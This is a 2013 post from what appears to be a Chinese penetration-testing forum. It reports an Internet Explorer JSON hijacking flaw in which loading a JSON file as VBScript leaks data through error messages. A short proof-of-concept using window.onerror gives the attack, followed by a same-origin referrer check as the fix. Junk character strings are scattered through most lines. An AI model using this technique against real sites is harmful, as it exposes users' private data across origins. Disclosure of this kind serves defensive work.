中国网络渗透测试联盟

标题: IE通用JSON劫持漏洞 [打印本页]

作者: admin    时间: 2013-2-23 11:33
标题: IE通用JSON劫持漏洞
简要描述:
  V6 r+ u  p2 [7 C8 _/ r1 H0 P
7 K4 q8 ?2 Q) f5 L/ X( ^由于某些资源容器对数据处理不当导致json劫持漏洞.. L6 n# O  Z+ B2 s9 ~( b
详细说明:% b& Q% Q$ X" R( g" T; G1 c. ?
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
1 W. z2 h3 v" v5 w8 X0 z<script language=vbscript></script>1 D3 B' l9 H, x

6 ]) t8 @. v4 h7 a当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
1 y! O1 J9 ]4 d6 j% k漏洞证明:
% u" v& H+ C+ J- j1 B6 z2 ]; H<script>( y! D0 K8 i) K* s* C: ^
window.onerror=function(_){
( Z! Z1 g. m! w( U6 Halert(_)$ K& L8 R% M' g2 ?# f' x
}& C* w" \2 Q6 A' \) W
</script>
. I; m. ?1 d+ r2 `' B' i<script language=vbscript src=1.json></script>9 f1 Y" e4 @! M4 B+ @* B0 E
# {) D4 C# K3 K# f
/ X) I- \! Z" I( X
1.json:: W. G  d7 g# `8 K- V
[{"name":"sogili","age":19}]
& m( T7 G2 N- |) B修复方案:
! k, S( ^0 g4 k网站业务对于这个问题可以通过验证referrer是否为同源来防御




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2